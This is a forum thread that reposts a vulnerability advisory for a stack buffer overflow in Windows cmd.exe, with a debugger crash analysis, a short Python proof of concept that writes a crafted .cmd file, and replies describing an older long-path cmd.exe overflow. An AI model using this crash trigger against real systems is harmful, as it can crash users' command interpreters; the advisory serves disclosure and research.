请选择 进入手机版 | 继续访问电脑版
查看: 4492|回复: 2

Windows cmd.exe溢出漏洞

[复制链接]
  • TA的每日心情

    昨天 15:36
  • 签到天数: 1122 天

    [LV.10]以坛为家III

    发表于 2021-9-24 21:47:34 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    # Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
    # Author: John Page (aka hyp3rlinx)
    # Source:  [url]http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt[/url]
    # ISR: ApparitionSec
     
    [Vendor]
    [url]www.microsoft.com[/url]
     
     
    [Product]
    cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. 
     
     
    [Vulnerability Type]
    Stack Buffer Overflow
     
     
    [CVE Reference]
    N/A
     
     
    [Security Issue]
    Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.
     
    E.g. cmd.exe /c <PAYLOAD>.
     
    [Memory Dump]
    (660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
    ntdll!ZwWaitForMultipleObjects+0x14:
    00007ffb`00a809d4 c3              ret
     
     
    0:000> .ecxr
    rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
    rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
    rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
    r8=000000000000200c  r9=00007ff7c0e60520 r10=0000000000000000
    r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
    r14=000002e34d796890 r15=000000000000200d
    iopl=0         nv up ei pl nz na pe nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
    cmd!StripQuotes+0xa8:
    00007ff7`c0e214f8 cc              int     3
     
    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
     
    *                        Exception Analysis                                   *
     
    *                                                                             *
    *******************************************************************************
     
    Failed calling InternetOpenUrl, GLE=12029
     
    FAULTING_IP: 
    cmd!StripQuotes+a8
    00007ff7`c0e214f8 cc              int     3
     
     
    EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
    ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
       ExceptionCode: c0000409 (Stack buffer overflow)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 0000000000000008
     
    PROCESS_NAME:  cmd.exe
     
    ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
     
    EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
     
    EXCEPTION_PARAMETER1:  0000000000000008
     
    MOD_LIST: <ANALYSIS/>
     
    NTGLOBALFLAG:  0
     
    APPLICATION_VERIFIER_FLAGS:  0
     
    FAULTING_THREAD:  00000000000012d4
     
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
     
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE
     
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE
     
    LAST_CONTROL_TRANSFER:  from 00007ffafcfca9c6 to 00007ffb00a809d4
     
    STACK_TEXT:  
    000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
    000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
    000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
    000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
    000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
    000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
    000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
    000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
    000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
    000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
    000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
    000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
    000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
    000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
    000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
    000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
    000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
     
    FOLLOWUP_IP: 
    cmd!StripQuotes+a8
    00007ff7`c0e214f8 cc              int     3
     
    SYMBOL_STACK_INDEX:  8
     
    SYMBOL_NAME:  cmd!StripQuotes+a8
     
    FOLLOWUP_NAME:  MachineOwner
     
    MODULE_NAME: cmd
     
    IMAGE_NAME:  cmd.exe
     
    DEBUG_FLR_IMAGE_TIMESTAMP:  0
     
    STACK_COMMAND:  ~0s ; kb
     
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
     
    BUCKET_ID:  X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
     
     
    [Exploit/POC]
    PAYLOAD=chr(235) + "\\CC"
    PAYLOAD = PAYLOAD * 3000
     
    with open("hate.cmd", "w") as f:
        f.write(PAYLOAD)
     
     
    [Network Access]
    Local
     
     
    [Video PoC URL]
    [url]https://www.youtube.com/watch?v=wYYgjV-PzD8[/url]
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2021-10-18 01:53
  • 签到天数: 41 天

    [LV.5]常住居民I

    发表于 2021-9-25 00:44:59 | 显示全部楼层
    WindowsNT和2000是Microsoft开发和维护的操作系统。WindowsNT和2000中使用的cmd.exe没有正确处理路径超过256字符的情况,本地攻击者可以利用这个漏洞进行缓冲区溢出或者cd转换目录命令失败。NTFS文件系统允许建立无限长度的路径,而WindowsAPI却只允许路径不超过256字节。WindowsNT和2000下的cmd.exe不能正确处理路径包含256字符的情况,如果cd命令用于更换到超过256字符的子目录,在WindowsNT4.0系统下会发生缓冲区溢出,存在执行任意指令可能,而在Windows2000下会导致cd命令失败。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2021-10-7 09:32
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2021-10-7 09:37:54 | 显示全部楼层
    owo这年头cmd都能溢出了……
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表